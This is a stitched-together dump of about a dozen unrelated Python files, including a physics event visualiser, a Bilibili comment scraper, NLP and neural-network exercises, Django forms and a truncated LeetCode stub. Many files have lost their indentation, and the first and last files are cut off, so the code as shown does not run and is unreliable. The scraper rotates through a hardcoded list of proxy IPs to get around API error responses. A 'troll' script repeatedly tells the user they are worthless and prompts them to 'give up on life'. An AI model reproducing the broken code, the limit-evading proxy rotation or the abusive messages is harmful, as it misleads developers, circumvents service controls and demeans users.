if self.tc is None:
self.tc = ROOT.TCanvas('_tc', '_tc', 800, 800)
ROOT.gErrorIgnoreLevel = ROOT.kWarning
_hetaphi_next = self.hetaphi.Clone("_next")
for iev in tqdm.tqdm(range(self.n_events)):
parts = self.data_io.load_event(offset=10000)
_hetaphi_next.Reset()
#_tmp = [_hetaphi_next.Fill(p.eta(), p.phi()-ROOT.TMath.Pi(), p.e()) for p in parts]
#_tmp = [_hetaphi_next.Fill(p.phi()-ROOT.TMath.Pi(), p.eta(), p.e()) for p in parts]
pyev = None
if self.pythia:
pyev = self.pythia.get_event()
if pyev:
_tmp = [_hetaphi_next.Fill(p.phi()-ROOT.TMath.Pi(), p.eta(), p.e()) for p in pyev]
if iev > 0:
self.morph(self.hetaphi, _hetaphi_next, 10)
self.hetaphi.Reset()
#_tmp = [self.hetaphi.Fill(p.phi()-ROOT.TMath.Pi(), p.eta(), p.e()) for p in parts]
if pyev:
_tmp = [self.hetaphi.Fill(p.phi()-ROOT.TMath.Pi(), p.eta(), p.e()) for p in pyev]
self.make_a_frame(self.hetaphi)
ROOT.gErrorIgnoreLevel = _err_level_tmp
def save_mp4(self):
# os.system('ffmpeg -r 10 -i _{}_%d.png -vcodec mpeg4 -y {}.mp4'.format(self.output, self.output))
# good page: https://hamelot.io/visualization/using-ffmpeg-to-convert-a-set-of-images-into-a-video/
os.system('ffmpeg -r 60 -f image2 -s 1920x1080 -i _{}_%d.png -vcodec libx264 -crf 25 -pix_fmt yuv420p {}.mp4'.format(self.output, self.output))
def main():
parser = argparse.ArgumentParser(description='pythia8 fastjet on the fly', prog=os.path.basename(__file__))
parser.add_argument('--flist', help='data from a file list', default='', type=str)
parser.add_argument('--pythia', help='run pythia', default=False, action='store_true')
parser.add_argument('--output', default="data2mp4", type=str)
parser.add_argument('--nev', help='number of events', default=500, type=int)
parser.add_argument('--convert-only', default=False, action='store_true')
parser.add_argument('--jf', default=False, action='store_true')
args = parser.parse_args()
# palette = []
# paletteSize = 2*2048 #1024
# for i in range(0, paletteSize):
# palette.append(ROOT.TColor.GetColor(1. - (i * 1.0) / paletteSize, 1. - (i * 1.0) / paletteSize, 1. - (i * 1.0) / paletteSize))
# palette_i = array.array('i', palette)
# ROOT.gStyle.SetPalette(paletteSize, palette_i)
# ROOT.gStyle.SetPalette(paletteSize, palette_i)
# https://root.cern.ch/doc/master/classTColor.html
ROOT.gStyle.SetPalette(53)
# ROOT.gStyle.SetPalette(56)
ROOT.gStyle.SetOptStat(0)
ROOT.gStyle.SetOptTitle(0)
if len(args.flist) > 0:
d2mp4 = Data2MP4(file_list=args.flist, output=args.output, n_events=args.nev, run_jetfinder=args.jf)
if args.pythia:
d2mp4 = Data2MP4Morph(file_list=args.flist, output=args.output, n_events=args.nev)
if d2mp4:
if args.convert_only is False:
if not os.path.isfile(args.flist):
print('[e] input file does not exists')
return
d2mp4.run()
d2mp4.save_mp4()
if __name__ == '__main__':
main()
|
from translate import translate
import getdata
import requests
import json
class video():
sockip = ['112.192.179.75:4258', '175.154.44.87:4258', '124.161.43.184:4258', '119.5.176.249:4258',
'175.155.50.78:4258', '112.194.178.181:4258', '124.161.212.88:4258', '119.5.179.10:4258',
'112.194.178.137:4258', '112.192.182.77:4258', '175.155.51.160:4258', '112.192.179.15:4258',
'112.194.178.22:4258', '119.5.177.126:4258', '119.5.177.172:4258', '119.5.189.136:4258',
'175.155.51.94:4258', '119.5.177.191:4258', '175.154.44.153:4258', '175.155.50.74:4258']
    av = ""
    bv = ""
    mid_reply = {}  # the user id corresponding to each top-level reply
def __init__(self,*args):
for i in args:
if i[0:2]=="BV":
self.bv = i
else:
self.av = i
if self.av!="" and self.bv =="":
self.bv = translate().enc(self.av)
if self.bv!="" and self.av =="":
self.av = translate().dec(self.bv)
def getav(self,av):
self.av = av
self.bv = translate().enc(self.av)
def getbv(self,bv):
        self.bv = bv
self.av = translate().dec(self.bv)
def putav(self):
return self.av
def putbv(self):
return self.bv
def check(self):
if self.av =="":
raise NameError("you should set av")
def getbasic(self):
self.check()
answer = {}
url = "http://api.bilibili.com/archive_stat/stat?aid="+self.av+"&type=jsonp"
dict_json = getdata.getdict(url)
print(dict_json)
answer = dict_json["data"]
if dict_json["code"] != 0:
raise Exception("请求错误,请重新检查")
        url = "https://api.bilibili.com/x/web-interface/view?aid="+self.av  # for video details this endpoint is the more important one; refer to this section when needed
dict_json = getdata.getdict(url)
        if dict_json["code"] != 0:
            # raise Exception("请求错误,请重新检查")
            print("[warn] the web-interface request returned a non-zero code")
answer["videos"] = []
answer["tid"] = []
answer["tname"] = []
answer["copyright"] = []
answer["title"] = []
        answer["desc"] = [] # video description
answer["videos"] = dict_json["data"]["videos"]
answer["tid"] = dict_json["data"]["tid"]
answer["tname"] = dict_json["data"]["tname"]
answer["copyright"] = dict_json["data"]["copyright"]
answer["title"] = dict_json["data"]["title"]
        answer["desc"] = dict_json["data"]["desc"] # video description
return answer
def getbasicinfo(self):
params = {"aid":"av值","view":"播放量","danmaku":"弹幕量","reply":"回复数","favorite":"收藏数","coin":"硬币数","share":"分享数","like":"点赞数","copyright":"1自制2转载"}
for key,value in params.items():
print(key," ",value)
def gettag(self):
self.check()
url = "http://api.bilibili.com/x/tag/archive/tags?aid="+self.av+"&jsonp=jsonp "
dict_json = getdata.getdict(url)
if dict_json["code"] != 0:
raise Exception("请求错误,请重新检查")
else:
dictinfo = {}
for i in dict_json["data"]:
dictinfo[i["tag_name"]] = i["tag_id"]
return dictinfo
def gettaginfo(self):
print("标签名称 标签id")
def getdict(self,page,av,k):
        url = "http://api.bilibili.com/x/v2/reply?jsonp=jsonp&pn="+page+"&type=1&oid="+av
if k<0:
p = requests.get(url)
res_p = p.content.decode()
return json.loads(res_p)
        elif k >= 0 and k < len(self.sockip):
            proxies = {
                "http": self.sockip[k],
                "https": self.sockip[k],
            }
            # route the request through the k-th proxy in the pool
            p = requests.get(url, proxies=proxies)
            res_p = p.content.decode()
            return json.loads(res_p)
else:
raise Exception("超出list范围")
def getreply(self,count):
self.check()
        url ="http://api.bilibili.com/x/v2/reply?jsonp=jsonp&pn=1"+"&type=1&oid="+self.av
need = count
times = 0
num = 1
flag = True
        answer = {}  # e.g. {'top-level comment': ['reply 1', 'reply 2'], 'another comment': []}
id_answer = {}
k = -1
dict_json = self.getdict(str(num), self.av,k)
while True:
if dict_json["code"] != 0:
k = k+1
dict_json = self.getdict(str(num), self.av, k)
else:
break
while dict_json["data"]["replies"] != None and flag:
for i in dict_json["data"]["replies"]:
if i["content"]["message"] not in answer.keys():
answer[i["content"]["message"]] = []
id_answer[i["content"]["message"]] = []
id_answer[i["content"]["message"]].append(i["mid"])
if i["replies"] !=None:
for j in i["replies"]:
answer[i["content"]["message"]].append(j["content"]["message"])
times += 1
if times == need:
flag =False
break
# print("第"+str(num)+"页下载成功")
num +=1
dict_json = self.getdict(str(num), self.av,k)
return answer
|
import tensorflow as tf
input_data = [1, 2, 3, 4, 5]
x = tf.placeholder(dtype=tf.float32)
y = x * 2
sess = tf.Session()
print(sess.run(y, feed_dict={x: input_data}))
a = tf.placeholder(dtype=tf.float32)
b = tf.placeholder(dtype=tf.float32)
z = tf.multiply(a, b)
print(sess.run(z, feed_dict={a: [[3, 2], [1, 2]], b: [[10], [20]]}))
c = tf.placeholder(dtype=tf.float32, shape=[None, 2])
d = tf.placeholder(dtype=tf.float32, shape=[None, 1])
z = tf.matmul(c, d)
print(sess.run(z, feed_dict={c: [[3, 2], [1, 3], [2, 4]], d: [[3], [1]]}))
|
from django.conf.urls.defaults import patterns, include, url
urlpatterns = patterns('articles.views',
url(r'^(?P<slug>[-\w]+)/$', 'detail', name='articles_detail'),
)
|
import numpy as np
from ..algo import score_bump
def test_score_bump():
x = 0
vals = [0, 0.5, 0.75, 0.875]
for i, item in enumerate(vals):
assert x == vals[i]
x = score_bump(x)
|
#W.A.P to troll you
while(1>0):
a=raw_input("Enter your gender(m/f) : ")
if a!='m':
print "YOU ARE A WASTE"
if a=='m':
a="males??"
print "Did you know that almost half of the world's population are",a
print""
print "This means that you are not as unique as you think..."
print"YOU ARE COMPLETELY WORTHLESS"
else:
print "YOU ARE A WASTE"
print "YOU ARE A WASTE"
print "YOU ARE A WASTE"
print "YOU ARE A WASTE"
print "YOU ARE A WASTE"
print "YOU ARE A WASTE"
print""
print"_______________________________________________"
a=input("Enter 1 to try again, 2 to give up on life : ")
if a!=1:
print" _____________"
print"|_____RIP_____|",exit()
|
# %%
# import NLP libraries
import spacy
from gensim.corpora.dictionary import Dictionary
# %%
# import utility and data libraries
import os
import re
import pandas as pd
import numpy as np
# %%
# load spacy model
nlp = spacy.load("en_core_web_md")
# %%
# load state of the union texts
def load_texts(dir_path):
"""
- Parameters: dir_path (string) for a directory containing text files.
- Returns: A list of dictionaries with keys file_name and text.
"""
docs = []
for file_name in os.listdir(dir_path):
file_path = os.path.join(dir_path, file_name)
if file_name.endswith(".txt") and os.path.isfile(file_path):
with open(file_path, "r+", encoding="utf-8") as file:
text = file.read()
current = {
"file_name": file_name,
"text": text
}
docs.append(current)
return docs
def add_sotu_metadata(sotu_doc_dict):
"""
- Parameters: sotu_doc_dict (dictionary) with sotu metadata.
Expects a file_name key in format "president_year.txt"
- Returns: A dictionary with appended president and year keys.
"""
file_name = sotu_doc_dict["file_name"]
pres, year, filetype = re.split(r"[^A-Za-z0-9]", file_name)
sotu_doc_dict["president"] = pres
sotu_doc_dict["year"] = int(year)
return sotu_doc_dict
def load_sotu_texts(dir_path):
"""
- Parameters: dir_path (string) for a directory containing text files.
Expects sotu text files in dir_path in format "president_year.txt".
- Returns: A Pandas DataFrame with file_name, text, president, and year
columns for each sotu text in dir_path.
"""
docs = load_texts(dir_path)
docs = [add_sotu_metadata(d) for d in docs]
docs = sorted(docs, key=lambda d: d["year"])
df = pd.DataFrame(docs)
return df[["year", "president", "text"]]
sotu_df = load_sotu_texts("data")
# %%
# simple boolean search
def search_df_texts(df, query_string: str):
"""
- Parameters: df (Pandas DataFrame), query_string (string). df must
contain a "text" column.
- Returns: A subset of df containing only rows where each term in
query_string appeared in df["text"].
"""
terms = query_string.lower().split(" ")
filters = [df["text"].str.lower().str.contains(term) for term in terms]
return df[np.all(filters, axis=0)]
search_term = "space rocket soviet"
results = search_df_texts(sotu_df, search_term)
print(f"Num results for query '{search_term}': {results.shape[0]}")
print(results.head())
# %%
# tokenize documents
def spacy_doc(model, text, lower=True):
"""
- Parameters: model (Spacy model), text (string), lower (bool).
- Returns: A Spacy Document object processed using the provided
model. Document is all lowercase if lower is True.
"""
if lower:
text = text.lower()
return model(text)
sotu_docs = [spacy_doc(nlp, text) for text in sotu_df["text"]]
# %%
# build dictionary
def get_token_texts(doc):
"""
- Parameters: doc (Spacy Document object).
- Returns: A list of strings based on the text value of each token
in doc.
"""
token_list = [token for token in doc]
return [token.text for token in token_list]
def build_dictionary(doc_list):
"""
- Parameters: doc_list (list of Spacy Document objects).
- Returns: A Gensim Dictionary, built using the tokens in each document
contained in doc_list.
"""
return Dictionary([get_token_texts(doc) for doc in doc_list])
sotu_dictionary = build_dictionary(sotu_docs)
# %%
# build bag-of-words model
def build_corpus(doc_list, dictionary):
"""
- Parameters: doc_list (list of Spacy Document objects), dictionary
(Gensim Dictionary object).
- Returns: A list of documents in bag-of-words format, containing tuples
with (token_id, token_count) for each token in the text.
"""
return [dictionary.doc2bow(get_token_texts(doc)) for doc in doc_list]
def build_td_matrix(doc_list, dictionary):
"""
- Parameters: doc_list (list of Spacy Document objects), dictionary
(Gensim Dictionary object).
- Returns: A term-document matrix in the form of a 2D NumPy Array, where
each row contains the count of a token in the corresponding document
and each column index is the id of a token in the dictionary.
"""
    corpus = build_corpus(doc_list, dictionary)
tdm = []
for bow in corpus:
vector = np.zeros(len(dictionary))
for token_id, token_count in bow:
vector[token_id] = token_count
tdm.append(vector)
return np.array(tdm)
def build_term_document_df(doc_list, dictionary):
"""
- Parameters: doc_list (list of Spacy Document objects), dictionary
(Gensim Dictionary object).
- Returns a term-document matrix in the form of a Pandas Dataframe,
where each row is a document and each column is a token. Values in
the dataframe are token counts for the given document / token.
"""
tdm = build_td_matrix(doc_list, dictionary)
cols = list(dictionary.token2id.keys())
return pd.DataFrame(tdm, columns=cols, dtype=pd.Int64Dtype)
sotu_corpus = build_corpus(sotu_docs, sotu_dictionary)
sotu_tdm = build_td_matrix(sotu_docs, sotu_dictionary)
sotu_td_df = build_term_document_df(sotu_docs, sotu_dictionary)
# %%
# term-document frequency search based on the bag-of-words model
def search_td_df(td_df, text_df, query_string: str):
"""
- Parameters: td_df (Pandas DataFrame) representing a term-document matrix,
text_df (Pandas DataFrame) with a "text" column and rows that correspond
to the td_df, and query_string (string).
- Returns: A new dataframe that only contains rows from text_df where the
"text" column had at least one occurence of each term in query_string.
Additional columns are added to show the count of each term and the
total count of all terms.
"""
terms = query_string.lower().split(" ")
filters = [td_df[term] > 0 for term in terms]
filtered_td_df = td_df[np.all(filters, axis=0)][terms]
filtered_td_df["terms_sum"] = filtered_td_df.agg(sum, axis=1).astype("int64")
full_df = text_df.merge(filtered_td_df, left_index=True, right_index=True)
return full_df.sort_values("terms_sum", ascending=False)
search_td_df(sotu_td_df, sotu_df, search_term).head()
# %%
# build tf-idf model
def document_frequency(td_df, term: str):
"""
- Parameters: td_df (Pandas DataFrame) representing a term-document matrix,
and term (string).
- Returns: The document frequency value showing the number of documents in
td_df where term occurs at least once.
"""
return td_df[td_df[term] > 0].shape[0]
def inverse_document_frequency(td_df, term: str):
    """
    - Parameters: td_df (Pandas DataFrame) representing a term-document matrix,
      and term (string).
    - Returns: The inverse document frequency value for term, calculated as
      log10(N / dft) where N is the number of documents in td_df and dft is the
      document frequency value for term.
    """
    N = td_df.shape[0]
    dft = document_frequency(td_df, term)
    return np.log10(N / dft)
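# Worked example of the convention above (illustrative numbers only): with N = 10
# documents and a term that appears in dft = 2 of them, idf = log10(10 / 2) ~= 0.7,
# while a term that appears in every document gets idf = log10(1) = 0.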
def build_tfidf_df(td_df):
"""
- Parameters: td_df (Pandas DataFrame) representing a term-document matrix.
- Returns: Returns a term frequency-inverse document frequency (TF-IDF)
matrix in the form of a Pandas DataFrame, where each row is a document and
each column is a token. Values in the dataframe are TF-IDF values for the
given document / token.
"""
def calculate_tfidf(col, td_df):
idf = inverse_document_frequency(td_df, col.name)
return col * idf
return td_df.apply(calculate_tfidf, td_df=td_df)
# %%
sotu_tfidf_df = build_tfidf_df(sotu_td_df)
# %%
# search based on the tf-idf model
def search_tfidf_df(tfidf_df, text_df, query_string: str):
"""
- Parameters: tfidf_df (Pandas DataFrame) representing a tf-idf matrix,
text_df (Pandas DataFrame) with a "text" column and rows that correspond
to the tfidf_df, and query_string (string).
- Returns: A new dataframe that only contains rows from text_df where the
corresponding tf-idf value was greater than zero for each of the terms
in query_string. Additional columns are added to show the tf-idf value
for each term and the sum of the tf-idf values.
"""
terms = query_string.lower().split(" ")
filters = [tfidf_df[term] > 0 for term in terms]
filtered_tfidf_df = tfidf_df[np.all(filters, axis=0)][terms]
filtered_tfidf_df["tfidf_sum"] = filtered_tfidf_df.agg(sum, axis=1)
full_df = text_df.merge(filtered_tfidf_df, left_index=True, right_index=True)
return full_df.sort_values("tfidf_sum", ascending=False)
search_tfidf_df(sotu_tfidf_df, sotu_df, search_term).head()
# %%
|
import torch
import torchaudio
import librosa
import csv
import ast
import warnings
from multiprocessing import cpu_count
from pathlib import Path
from utils.logger import get_logger
from utils.ipa_encoder import EOS_ID
logger = get_logger('asr.train')
warnings.filterwarnings('ignore')
class SpeechDataset(torch.utils.data.Dataset):
def __init__(self, data, sample_rate, mode='torchaudio'):
self.sample_rate = sample_rate
self.data = data
self.mode = mode
def __getitem__(self, idx):
filename, ids = self.data[idx]
if self.mode == 'librosa':
            audio, _ = librosa.load(filename, sr=self.sample_rate)
audio = torch.Tensor(audio)
elif self.mode == 'torchaudio':
audio, sr = torchaudio.load(filename)
if sr != self.sample_rate:
audio = torchaudio.transforms.Resample(sr, self.sample_rate)(audio)
audio.squeeze_()
return audio, torch.Tensor(ast.literal_eval(ids))
def __len__(self):
return len(self.data)
def get_collate_fn(max_len_src=None, max_len_tgt=None):
def collate_fn(batch):
nonlocal max_len_src, max_len_tgt
feature_lengths = torch.Tensor([audio.size(0) for audio, _ in batch])
if max_len_src is None:
max_len_src = feature_lengths.max().item()
target_lengths = torch.Tensor([ids.size(0) for _, ids in batch])
if max_len_tgt is None:
max_len_tgt = target_lengths.max().item()
features = torch.nn.utils.rnn.pad_sequence([audio for audio, _ in batch], batch_first=True)
targets = torch.nn.utils.rnn.pad_sequence([targets for _, targets in batch], batch_first=True,
padding_value=EOS_ID).to(torch.int64)
return features, feature_lengths, targets, target_lengths
return collate_fn
def get_loader(data, sample_rate, batch_size, shuffle,
max_len_src, max_len_tgt):
dataset = SpeechDataset(data, sample_rate)
loader = torch.utils.data.DataLoader(dataset, batch_size, shuffle,
collate_fn=get_collate_fn(max_len_src, max_len_tgt),
num_workers=cpu_count() - 1)
return loader
def load_dataset(data_path, subset='train'):
filename = str(Path(data_path) / f'{subset}.tsv')
logger.info(f'Reading data from {filename}')
dataset = []
with open(filename, 'r') as fid:
reader = csv.reader(fid, dialect='excel-tab')
for row in reader:
dataset.append(row)
return dataset
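# Hypothetical usage sketch (the paths and hyper-parameters below are made up, not
# taken from the project's configs):
# data = load_dataset('data', subset='train')
# loader = get_loader(data, sample_rate=16000, batch_size=8, shuffle=True,
#                     max_len_src=None, max_len_tgt=None)
# for features, feature_lengths, targets, target_lengths in loader:
#     ...  # feed the padded batch to the model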
|
import logging
logger = logging.getLogger(__name__)
import django.forms as forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import (
Layout,
Fieldset,
Submit,
Div,
HTML,
Field,
Button
)
from models import Project, Category, Version, Entry
class ProjectForm(forms.ModelForm):
class Meta:
model = Project
def __init__(self, *args, **kwargs):
self.helper = FormHelper()
layout = Layout(
Fieldset(
'Project details',
Field('name', css_class="form-control"),
Field('image_file', css_class="form-control"),
css_id='project-form')
)
self.helper.layout = layout
self.helper.html5_required = False
super(ProjectForm, self).__init__(*args, **kwargs)
self.helper.add_input(Submit('submit', 'Submit'))
class CategoryForm(forms.ModelForm):
class Meta:
model = Category
def __init__(self, *args, **kwargs):
self.helper = FormHelper()
layout = Layout(
Fieldset(
'Category details',
Field('project', css_class="form-control"),
Field('name', css_class="form-control"),
Field('sort_number', css_class="form-control"),
css_id='project-form')
)
self.helper.layout = layout
self.helper.html5_required = False
super(CategoryForm, self).__init__(*args, **kwargs)
self.helper.add_input(Submit('submit', 'Submit'))
class VersionForm(forms.ModelForm):
class Meta:
model = Version
def __init__(self, *args, **kwargs):
self.helper = FormHelper()
layout = Layout(
Fieldset(
'Version details',
Field('project', css_class="form-control"),
Field('name', css_class="form-control"),
Field('description', css_class="form-control"),
Field('image_file', css_class="form-control"),
css_id='project-form')
)
self.helper.layout = layout
self.helper.html5_required = False
super(VersionForm, self).__init__(*args, **kwargs)
self.helper.add_input(Submit('submit', 'Submit'))
class EntryForm(forms.ModelForm):
class Meta:
model = Entry
def __init__(self, *args, **kwargs):
self.helper = FormHelper()
layout = Layout(
Fieldset(
'Entry details',
Field('version', css_class="form-control"),
Field('category', css_class="form-control"),
Field('title', css_class="form-control"),
Field('description', css_class="form-control"),
Field('image_file', css_class="form-control"),
Field('image_credits', css_class="form-control"),
css_id='entry-form')
)
self.helper.layout = layout
self.helper.html5_required = False
super(EntryForm, self).__init__(*args, **kwargs)
self.helper.add_input(Submit('submit', 'Submit'))
# Filter the category list when editing so it shows only relevent ones
if self.instance.id is not None:
self.fields['category'].queryset = Category.objects.filter(
project=self.instance.version.project)
|
try:
read_or_write = input("Haluatko lukea vai kirjoittaa vieraskirjaan? (l/k)\n")
if read_or_write == "l":
        # open the file
file_handle = open("guestbook.txt", "r", encoding='utf-8')
        # read the file contents
content = file_handle.read()
        # split the contents into a list on "\n"
lines = content.split("\n")
        # go through it one line at a time
for line in lines:
print(line)
        # close the file
file_handle.close()
elif read_or_write == "k":
        # open the file, "a" = append
file_handle = open("guestbook.txt", "a", encoding='utf-8')
        # ask for the message to write
write_input = input("Kirjoita uusi viesti:\n")
        # write the message to the file and add a newline
file_handle.write(write_input)
file_handle.write("\n")
print("Viesti tallennettu vieraskirjaan.")
        # close the file
file_handle.close()
else:
print("Väärä muoto!")
except ValueError:
print("Väärä muoto!")
|
import numpy as np
import matplotlib.pyplot as plt
class BPNN:
def __init__(self, nn_shape=[2, 4, 1]):
        self.W = []  # weights
        self.B = []  # thresholds (biases)
        self.O = []  # output of every layer of neurons
        self.grads = []  # gradient terms of BP: derivative of the error w.r.t. each node's net input
self.mean = np.zeros(nn_shape[2])
self.mean = self.mean.reshape((1, nn_shape[2]))
self.W_shape = []
self.B_shape = []
self.O_shape = []
self.grads_shape = []
        self.errs = []  # record the error of every training iteration
        for index in range(len(nn_shape) - 1):  # initialise the W, B, O and grads matrices
self.W.append(2 * np.random.random([nn_shape[index], nn_shape[index + 1]]) - 1)
self.W[index] = self.W[index].reshape([nn_shape[index], nn_shape[index + 1]])
self.W_shape.append(self.W[index].shape)
self.B.append(2 * np.random.random(nn_shape[index + 1]) - 1)
self.B[index] = self.B[index].reshape(1, nn_shape[index + 1])
self.B_shape.append(self.B[index].shape)
self.O.append(np.zeros(nn_shape[index + 1]))
self.O[index] = self.O[index].reshape(1, nn_shape[index + 1])
self.O_shape.append(self.O[index].shape)
self.grads.append(np.zeros(nn_shape[index + 1]))
self.grads[index] = self.grads[index].reshape(1, nn_shape[index + 1])
self.grads_shape.append(self.grads[index].shape)
self.y_hat = self.O[-1]
self.y_hat = self.y_hat.reshape(self.O[-1].shape)
print('建立{}层神经网络网络'.format(len(nn_shape)))
print(self.W_shape)
print(self.B_shape)
print(self.O_shape)
print(self.grads_shape)
def sigmoid(self, x):
return 1.0 / (1.0 + np.exp(-x))
def sigmoid_derivate(self, x):
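        # x is the already-activated output o = sigmoid(z), so sigma'(z) = o*(1-o) = x*(1-x)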
return x * (1 - x)
def error(self, y, y_hat):
err = y - y_hat
return 0.5 * err.dot(err.T)
def cross_entropy(self, y, y_hat):
tmp = np.argwhere(y == 1)
return -np.log(y_hat[0, tmp[0, 1]])
def softmax(self, x):
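        # plain softmax; a numerically safer variant would subtract np.max(x)
        # before exponentiating, which leaves the result unchanged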
exp_all = np.exp(x)
return exp_all / np.sum(exp_all)
def update_output(self, x, x_istest=False):
'''
        Update the output of every neuron; x is one input sample (a row vector)
'''
if x_istest == True:
x = (x - self.mean) / self.var
for index in range(len(self.O)):
if index == 0:
self.O[index] = self.sigmoid(
x.dot(self.W[index]) + self.B[index])
elif index == len(self.O) - 1:
self.O[index] = self.softmax(
self.O[index - 1].dot(self.W[index]) + self.B[index])
else:
self.O[index] = self.sigmoid(
self.O[index - 1].dot(self.W[index]) + self.B[index])
self.O[index] = self.O[index].reshape(self.O_shape[index])
self.y_hat = self.O[-1]
self.y_hat = self.y_hat.reshape(self.O[-1].shape)
return self.y_hat
def update_grads(self, y):
'''
        Update the gradient terms; y is the one-hot label vector
'''
for index in range(len(self.grads) - 1, -1, -1):
if index == len(self.grads) - 1:
                '''# this block computes the output-layer gradient for a binary classifier that uses squared error and a sigmoid output
self.grads[index] = self.sigmoid_derivate(
self.O[index]) * (y - self.O[index])
'''
tmp = np.argwhere(y == 1)
for index_g in range(self.grads[index].shape[1]):
if index_g == tmp[0, 1]:
self.grads[index][0, index_g] = 1 - self.O[index][0, index_g]
else:
self.grads[index][0, index_g] = - self.O[index][0, index_g]
            else:  # hidden-layer gradients via the chain rule
self.grads[index] = self.sigmoid_derivate(
self.O[index]) * self.W[index + 1].dot(self.grads[index + 1].T).T
self.grads[index] = self.grads[index].reshape(
self.grads_shape[index])
    def update_WB(self, x, learning_rate):
        # self.grads already holds the negative error gradient, and B is added in
        # the forward pass, so both W and B are updated with the same (+) sign
        for index in range(len(self.W)):
            if index == 0:
                self.W[index] += learning_rate * x.T.dot(self.grads[index])
                self.B[index] += learning_rate * self.grads[index]
            else:
                self.W[index] += learning_rate * self.O[index - 1].T.dot(self.grads[index])
                self.B[index] += learning_rate * self.grads[index]
                self.B[index] = self.B[index].reshape(self.B_shape[index])
def preprocess(self, X, method='centring'):
self.mean = np.mean(X, axis=0)
self.var = X.var()
X = (X - self.mean) / self.var
if method == 'centring':
return X
def fit(self, X, Y, Preprocess=True, method='centring', thre=0.03, learning_rate=0.001, max_iter=1000):
'''
        Feed in the samples and labels; each sample in X and Y is a row vector
'''
if Preprocess == True:
X = self.preprocess(X, method=method)
err = np.inf
count = 0
while err > thre:
err = 0
for index in range(X.shape[0]):
x = X[index, :].reshape((1, -1))
y = Y[index, :].reshape((1, -1))
self.update_output(x)
x = X[index, :].reshape((1, -1))
self.update_grads(y)
self.update_WB(x, learning_rate=learning_rate)
err += self.cross_entropy(y, self.y_hat)
err /= index + 1
self.errs.append(err)
count += 1
if count > max_iter:
print("超过最大迭代次数{}".format(max_iter))
break
print(count)
print(err)
def one_hot_label(self, Y):
'''
        Convert the labels to one-hot form: with 3 classes the labels become 100, 010, 001.
        The labels here must start from 0.
'''
category = list(set(Y[:, 0]))
Y_ = np.zeros([Y.shape[0], len(category)])
for index in range(Y.shape[0]):
Y_[index, Y[index, 0]] = 1
return Y_
if __name__ == '__main__':
from sklearn.datasets import load_digits
digits = load_digits()
X = digits.data
Y = digits.target
X = X.reshape(X.shape)
Y = Y.reshape(Y.shape[0], 1)
    bp = BPNN([64, 128, 64, 10])  # create the neural-network object
Y = bp.one_hot_label(Y)
train_data = X[:1000, :]
train_label = Y[:1000, :]
test_data = X[1000:-1, :]
test_label = Y[1000:-1, :]
    bp.fit(train_data, train_label, Preprocess=True, thre=0.01, learning_rate=0.005, max_iter=1000)  # train the network
count = 0
for i in range(test_data.shape[0]):
x = test_data[i].reshape(1, 64)
pre = bp.update_output(x, x_istest=True)
y = test_label[i].reshape(1, 10)
a = np.where(pre == np.max(pre))
b = np.where(y == np.max(y))
if a[1][0] == b[1][0]:
count += 1
print('准确率:{}'.format(count / test_label.shape[0]))
plt.plot(bp.errs)
plt.show()
|
from pandas import *
from ggplot import *
import pprint
import datetime
import itertools
import operator
import brewer2mpl
import ggplot as gg
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import pylab
import scipy.stats
import statsmodels.api as sm
#%matplotlib inline
#ggplot.colors.COLORS.extend(["#ff0000", "#00ff00", "#0000ff"])
def plot_weather_data(tw):
# plot=ggplot(aes(y='ENTRIESn_hourly',x='Hour'), data=tw) \
# +geom_point(color='lightblue')+stat_smooth(span=.15,color='black',se=True) \
# +xlab("Hour")+ylab("ENTRIESn_hourly")+ggtitle("T")
# plot=ggplot(aes(x='ENTRIESn_hourly'), data=tw)+geom_density() \
# +xlab("ENTRIESn_hourly")+ylab("Density")+ggtitle("T")
# plot=ggplot(tw,aes(x='EXITSn_hourly',y='ENTRIESn_hourly', color='rain')) \
# +geom_point()+xlab("X")+ylab("Y")+ggtitle("T")
# plot=ggplot(tw,aes(x='EXITSn_hourly', fill='ENTRIESn_hourly')) \
# +geom_density(alpha=0.25)+facet_wrap("grp")
# plot=ggplot(tw,aes(x='EXITSn_hourly', fill='grp'))+geom_density(alpha=0.25)
#ggsave(plot, "abc.png")
# return plot
    df = tw.copy()
#
    df['datetime'] = df.loc[:,'DATEn'].map(lambda x: pd.to_datetime(x))
df['dayofweek'] = df.loc[:,'datetime'].map(lambda x: x.strftime('%A'))
# print df['dayofweek']
# print df['ENTRIESn_hourly'].describe()
df['entries_log'] = np.log10(df['ENTRIESn_hourly'].fillna(0) + 1)
#plot = ggplot(turnstile_weather, aes('EXITSn_hourly', 'ENTRIESn_hourly')) \
# + stat_smooth(span=.15, color='black', se=True)+ geom_point(color='lightblue') \
# + ggtitle("MTA Entries By The Hour!") \
# + xlab('Exits') + ylab('Entries')
#plot = ggplot(df, aes('entries_log')) \
# + geom_histogram() \
# + facet_wrap('rain') \
# + ggtitle("Histogram log10(entries by hour). Rain No-Rain") \
# + xlab('Entries per hour') #+ ylab('Entries')
#df_group = df.groupby('dayofweek', as_index=False).sum()
#print df_group
#plot = ggplot(df_group, aes(x='dayofweek', y='ENTRIESn_hourly')) \
# + geom_bar(stat='bar') \
# + ggtitle("Entries by day of week") \
# + xlab('Day of week') + ylab('Entries') #+ scale_x_date(labels = date_format("%d"))
#df_group = df.groupby('Hour', as_index=False).sum()
#print df_group
#plot = ggplot(df_group, aes(x='Hour', y='ENTRIESn_hourly')) \
# + geom_bar(stat='bar') \
# + ggtitle("Entries by hour") \
# + xlab('Hour') + ylab('Entries') #+ scale_x_date(labels = date_format("%d"))
df_group = df.groupby(['Hour', 'rain'], as_index=False).median()
df_group.to_csv('dump.csv')
plot = ggplot(df_group, aes(x='Hour', y='ENTRIESn_hourly', color='rain')) \
+ geom_line() \
+ ggtitle("Entries median by hour of day, red=rain blue=no rain") \
+ xlab('Hour') + ylab('Median of ENTRIESn') \
+ scale_x_continuous(breaks=range(0,24,2))
# plot = df.describe()
return plot
if __name__ == "__main__":
image = "plot.png"
input_filename = 'C:/move - bwlee/Data Analysis/Nano/Intro to Data Science/project/code/turnstile_data_master_with_weather.csv'
# with open(image, "wb") as f:
    turnstile_weather = pd.read_csv(input_filename)
turnstile_weather['datetime']=turnstile_weather['DATEn']+' '+turnstile_weather['TIMEn']
gg=plot_weather_data(turnstile_weather)
print gg
# ggsave(f, gg)
|
from typing import List
class Solution:
    def rob(self, nums: List[int]) -> int:
        """
        https://leetcode.com/problems/house-robber/
        """
        if not nums:
            return 0
        # dp[i] = best amount obtainable from houses 0..i
        dp = [0 for i in range(len(nums))]
